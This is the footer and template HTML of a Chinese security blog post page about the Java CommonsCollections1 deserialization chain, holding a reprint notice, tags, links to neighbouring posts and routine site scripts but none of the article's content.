                    <a href="https://majorttt.github.io/2024/03/26/CommonsCollections1%E9%93%BE%E6%89%8B%E5%86%99%E5%88%A9%E7%94%A8/">https://majorttt.github.io/2024/03/26/CommonsCollections1%E9%93%BE%E6%89%8B%E5%86%99%E5%88%A9%E7%94%A8/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">MajorT</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/Java%E5%AE%89%E5%85%A8/">
                                    <span class="chip bg-color">Java安全</span>
                                </a>
                            
                                <a href="/tags/%E4%BB%A3%E7%A0%81/">
                                    <span class="chip bg-color">代码</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2024/04/10/%E8%AE%B0%E4%B8%80%E6%AC%A1%E8%89%B0%E9%9A%BE%E7%9A%84APP%E6%8A%93https%E5%8C%85/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/23.jpg" class="responsive-img" alt="记一次艰难的APP抓https包">
                        
                        <span class="card-title">记一次艰难的APP抓https包</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2024-04-10
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/APP%E6%B8%97%E9%80%8F/" class="post-category">
                                    APP渗透
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/Android%E6%B8%97%E9%80%8F/">
                        <span class="chip bg-color">Android渗透</span>
                    </a>
                    
                    <a href="/tags/%E6%8A%93%E5%8C%85/">
                        <span class="chip bg-color">抓包</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2024/03/22/urldns%E9%93%BE%E5%88%A9%E7%94%A8/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/3.jpg" class="responsive-img" alt="urldns链利用">
                        
                        <span class="card-title">urldns链利用</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2024-03-22
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/Java%E5%AE%89%E5%85%A8/" class="post-category">
                                    Java安全
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/Java%E5%AE%89%E5%85%A8/">
                        <span class="chip bg-color">Java安全</span>
                    </a>
                    
                    <a href="/tags/%E4%BB%A3%E7%A0%81/">
                        <span class="chip bg-color">代码</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>



<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>



    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="/libs/aplayer/Meting.min.js"></script>

    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2024</span>
            
            <a href="/about" target="_blank">MajorT</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            
            <br>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/majorttt" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:2330584030@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=2330584030" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 2330584030" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 白天和黑夜主题 -->
<div class="stars-con">
    <div id="stars"></div>
    <div id="stars2"></div>
    <div id="stars3"></div>  
</div>

<script>
    function switchNightMode() {
        $('<div class="Cuteen_DarkSky"><div class="Cuteen_DarkPlanet"></div></div>').appendTo($('body')),
        setTimeout(function () {
            $('body').hasClass('DarkMode') 
            ? ($('body').removeClass('DarkMode'), localStorage.setItem('isDark', '0'), $('#sum-moon-icon').removeClass("fa-sun").addClass('fa-moon')) 
            : ($('body').addClass('DarkMode'), localStorage.setItem('isDark', '1'), $('#sum-moon-icon').addClass("fa-sun").removeClass('fa-moon')),
            
            setTimeout(function () {
            $('.Cuteen_DarkSky').fadeOut(1e3, function () {
                $(this).remove()
            })
            }, 2e3)
        })
    }
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    

    
    
    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
    

     
        <script src="https://ssl.captcha.qq.com/TCaptcha.js"></script>
        <script src="/libs/others/TencentCaptcha.js"></script>
        <button id="TencentCaptcha" data-appid="xxxxxxxxxx" data-cbfn="callback" type="button" hidden></button>
    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
